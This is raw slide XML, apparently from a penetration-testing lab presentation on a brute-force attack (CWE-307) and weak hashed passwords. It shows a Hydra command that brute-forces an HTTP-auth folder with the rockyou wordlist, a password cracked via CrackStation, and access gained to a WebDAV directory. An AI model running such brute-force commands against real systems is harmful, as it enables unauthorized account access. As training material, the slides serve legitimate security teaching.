              <a:t>CrackStation</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> to crack Ryan`s password hash.</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kumimoji="0" lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs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200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Commands</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chemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hydra –l </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –P /</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/share/wordlists/rockyou.txt –s 80 –f –</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>vV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> 192.168.1.105 http-get /</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs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kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1118" name="Google Shape;1118;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62"/>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200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</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100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Ashtons password was successfully cracked. And I gained access to the content of the “</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>folder”.</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lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Discovered and cracked Ryan`s password hash which was located in the “secret folder” </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lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs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100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Ryan`s password: “ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>linux4u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>” gave me then access to the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> directory on the web server.</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kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs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100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Discovered a file called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>passwd.dav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Arrow: Down 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F94686CF-AE76-4CAB-A058-655C4A2F4EA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7492642" y="3259803"/>
            <a:ext cx="555414" cy="8961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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2D5E43E-CF9A-4647-9047-3D235926CCBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7180283" y="2571750"/>
            <a:ext cx="1239442" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Screenshots</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D20EEEC-18B1-48BB-8046-8BEB3EF2687A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2352573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AU" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Brute-Force Attack, CWE-307 &amp; Weak Hashed Passwords</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2400" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>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US" sz="1000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>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0483B919-3798-42D6-BEC2-149600A5AA95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1712794" y="754212"/>
            <a:ext cx="5718412" cy="267381"/>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FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hydra –l </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –P /</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/share/wordlists/rockyou.txt –s 80 –f –</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>vV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> 192.168.1.105 http-get /</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
